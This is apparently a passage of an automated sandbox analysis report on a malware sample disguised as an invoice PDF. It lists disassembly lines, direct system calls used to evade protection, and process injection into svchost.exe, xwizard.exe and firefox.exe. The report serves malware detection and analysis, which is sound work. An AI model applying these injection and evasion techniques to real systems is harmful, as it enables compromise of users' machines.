                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768620 mov eax, dword ptr fs:[00000030h]2_2_03768620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373262C mov eax, dword ptr fs:[00000030h]2_2_0373262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772619 mov eax, dword ptr fs:[00000030h]2_2_03772619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE609 mov eax, dword ptr fs:[00000030h]2_2_037AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov eax, dword ptr fs:[00000030h]2_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037666B0 mov eax, dword ptr fs:[00000030h]2_2_037666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C6A6 mov eax, dword ptr fs:[00000030h]2_2_0376C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]2_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]2_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]2_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]2_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6500 mov eax, dword ptr fs:[00000030h]2_2_037C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037325E0 mov eax, dword ptr fs:[00000030h]2_2_037325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]2_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]2_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037365D0 mov eax, dword ptr fs:[00000030h]2_2_037365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]2_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]2_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]2_2_0376E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]2_2_0376E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]2_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]2_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E59C mov eax, dword ptr fs:[00000030h]2_2_0376E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732582 mov eax, dword ptr fs:[00000030h]2_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732582 mov ecx, dword ptr fs:[00000030h]2_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764588 mov eax, dword ptr fs:[00000030h]2_2_03764588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC460 mov ecx, dword ptr fs:[00000030h]2_2_037BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA456 mov eax, dword ptr fs:[00000030h]2_2_037EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372645D mov eax, dword ptr fs:[00000030h]2_2_0372645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375245A mov eax, dword ptr fs:[00000030h]2_2_0375245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A430 mov eax, dword ptr fs:[00000030h]2_2_0376A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C427 mov eax, dword ptr fs:[00000030h]2_2_0372C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037304E5 mov ecx, dword ptr fs:[00000030h]2_2_037304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037644B0 mov ecx, dword ptr fs:[00000030h]2_2_037644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BA4B0 mov eax, dword ptr fs:[00000030h]2_2_037BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037364AB mov eax, dword ptr fs:[00000030h]2_2_037364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA49A mov eax, dword ptr fs:[00000030h]2_2_037EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372CB7E mov eax, dword ptr fs:[00000030h]2_2_0372CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEB50 mov eax, dword ptr fs:[00000030h]2_2_037DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]2_2_037E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]2_2_037E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]2_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]2_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FAB40 mov eax, dword ptr fs:[00000030h]2_2_037FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D8B42 mov eax, dword ptr fs:[00000030h]2_2_037D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]2_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]2_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]2_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]2_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EBFC mov eax, dword ptr fs:[00000030h]2_2_0375EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BCBF0 mov eax, dword ptr fs:[00000030h]2_2_037BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEBD0 mov eax, dword ptr fs:[00000030h]2_2_037DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Code function: 0_2_00426DA1 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_00426DA1
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Code function: 0_2_0042202E SetUnhandledExceptionFilter,0_2_0042202E
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Code function: 0_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004230F5
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Code function: 0_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00417D93
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Code function: 0_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00421FA7

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe NtAllocateVirtualMemory: Direct from: 0x76EF48EC
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe NtQueryAttributesFile: Direct from: 0x76EF2E6C
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe NtQuerySystemInformation: Direct from: 0x76EF48CC
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe NtOpenSection: Direct from: 0x76EF2E0C
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe NtDeviceIoControlFile: Direct from: 0x76EF2AEC
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe NtQueryInformationToken: Direct from: 0x76EF2CAC
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe NtCreateFile: Direct from: 0x76EF2FEC
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe NtOpenFile: Direct from: 0x76EF2DCC
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe NtTerminateThread: Direct from: 0x76EF2FCC
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe NtOpenKeyEx: Direct from: 0x76EF2B9C
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe NtSetInformationProcess: Direct from: 0x76EF2C5C
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe NtProtectVirtualMemory: Direct from: 0x76EF2F9C
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe NtWriteVirtualMemory: Direct from: 0x76EF2E3C
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe NtNotifyChangeKey: Direct from: 0x76EF3C2C
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe NtCreateMutant: Direct from: 0x76EF35CC
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe NtResumeThread: Direct from: 0x76EF36AC
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe NtMapViewOfSection: Direct from: 0x76EF2D1C
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe NtProtectVirtualMemory: Direct from: 0x76EE7B2E
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe NtQuerySystemInformation: Direct from: 0x76EF2DFC
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe NtReadFile: Direct from: 0x76EF2ADC
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe NtDelayExecution: Direct from: 0x76EF2DDC
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe NtQueryInformationProcess: Direct from: 0x76EF2C26
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe NtResumeThread: Direct from: 0x76EF2FBC
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe NtCreateUserProcess: Direct from: 0x76EF371C
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe NtSetInformationThread: Direct from: 0x76EE63F9
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe NtWriteVirtualMemory: Direct from: 0x76EF490C
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe NtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe NtSetInformationThread: Direct from: 0x76EF2B4C
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe NtCreateKey: Direct from: 0x76EF2C6C
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe NtReadVirtualMemory: Direct from: 0x76EF2E8C
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\xwizard.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\xwizard.exe Section loaded: NULL target: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe protection: read write
                Source: C:\Windows\SysWOW64\xwizard.exe Section loaded: NULL target: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\xwizard.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\xwizard.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\xwizard.exe Thread register set: target process: 7864
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2BD9008
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Code function: 0_2_0043916A LogonUserW,0_2_0043916A
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Code function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
